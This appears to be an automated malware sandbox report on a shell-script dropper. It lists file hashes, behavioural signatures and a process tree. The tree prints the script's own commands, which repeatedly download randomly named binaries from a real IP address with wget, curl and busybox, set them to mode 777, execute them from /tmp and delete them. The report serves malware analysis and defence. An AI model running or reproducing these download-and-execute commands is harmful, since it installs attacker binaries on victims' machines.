Analysis
-
max time kernel
13s -
max time network
14s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21-11-2024 08:50
Static task
static1
Behavioral task
behavioral1
Sample
f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109.sh
-
Size
10KB
-
MD5
5c002a675bf13d9254cbcf71d0880ad7
-
SHA1
6b23ac737bbb2a21a5e8e322b7a85ce0bd035c04
-
SHA256
f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109
-
SHA512
66f9f99ad03a2a5b56bb54c3676f86d33a5d7e165bf9d7c1e43da38c2005258128fcf95746bc924ca55f6dae423b1f7762bce982455e40fc33534ac37d545a7f
-
SSDEEP
192:mLvHEMP7PbcMUXRRJOC1WKbD+DyDxe+qfr97COC7xN7877P3XS7eSsaTXkfrFOCY:gEamxe+OOzgvSonamxe+0SO
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 718 chmod 704 chmod 748 chmod 674 chmod 820 chmod 832 chmod 781 chmod 691 chmod 732 chmod 767 chmod 796 chmod 811 chmod 826 chmod 685 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO 676 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO /tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J 686 yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J /tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV 692 CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV /tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF 705 uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF /tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8 720 IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8 /tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ 733 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ /tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l 749 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l /tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB 769 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB /tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA 783 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA /tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt 797 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt /tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI 813 Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI /tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG 821 e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG /tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp 827 GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp /tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M 833 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 14 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l curl File opened for modification /tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV curl File opened for modification /tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA curl File opened for modification /tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG curl File opened for modification /tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp curl File opened for modification /tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M curl File opened for modification /tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J curl File opened for modification /tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF curl File opened for modification /tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ curl File opened for modification /tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB curl File opened for modification /tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt curl File opened for modification /tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI curl File opened for modification /tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO curl File opened for modification /tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8 curl
Processes
-
/tmp/f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109.sh/tmp/f1e174b1d227f565f874156a1ed092123bfc4421c41ef3b7eb9f57d85b94a109.sh1⤵PID:646
-
/bin/rm/bin/rm bins.sh2⤵PID:648
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵PID:653
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:661
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵PID:672
-
-
/bin/chmodchmod 777 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- File and Directory Permissions Modification
PID:674
-
-
/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO./9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵
- Executes dropped EXE
PID:676
-
-
/bin/rmrm 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO2⤵PID:677
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵PID:679
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:682
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵PID:684
-
-
/bin/chmodchmod 777 yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- File and Directory Permissions Modification
PID:685
-
-
/tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J./yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵
- Executes dropped EXE
PID:686
-
-
/bin/rmrm yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J2⤵PID:687
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵PID:688
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:689
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵PID:690
-
-
/bin/chmodchmod 777 CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- File and Directory Permissions Modification
PID:691
-
-
/tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV./CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵
- Executes dropped EXE
PID:692
-
-
/bin/rmrm CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV2⤵PID:693
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵PID:694
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:697
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵PID:701
-
-
/bin/chmodchmod 777 uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- File and Directory Permissions Modification
PID:704
-
-
/tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF./uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵
- Executes dropped EXE
PID:705
-
-
/bin/rmrm uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF2⤵PID:706
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵PID:708
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:711
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵PID:716
-
-
/bin/chmodchmod 777 IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- File and Directory Permissions Modification
PID:718
-
-
/tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8./IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵
- Executes dropped EXE
PID:720
-
-
/bin/rmrm IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA82⤵PID:721
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵PID:722
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵PID:729
-
-
/bin/chmodchmod 777 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ./jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ2⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:737
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:745
-
-
/bin/chmodchmod 777 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l./qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l2⤵PID:751
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵PID:765
-
-
/bin/chmodchmod 777 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB./CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵
- Executes dropped EXE
PID:769
-
-
/bin/rmrm CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB2⤵PID:770
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:771
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:774
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:778
-
-
/bin/chmodchmod 777 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA./rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:784
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:785
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:789
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:793
-
-
/bin/chmodchmod 777 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt./yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt2⤵PID:798
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵PID:800
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵PID:809
-
-
/bin/chmodchmod 777 Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI./Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵PID:819
-
-
/bin/chmodchmod 777 e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG./e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵PID:825
-
-
/bin/chmodchmod 777 GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp./GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵PID:829
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵PID:831
-
-
/bin/chmodchmod 777 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M./V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M2⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA2⤵PID:835
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97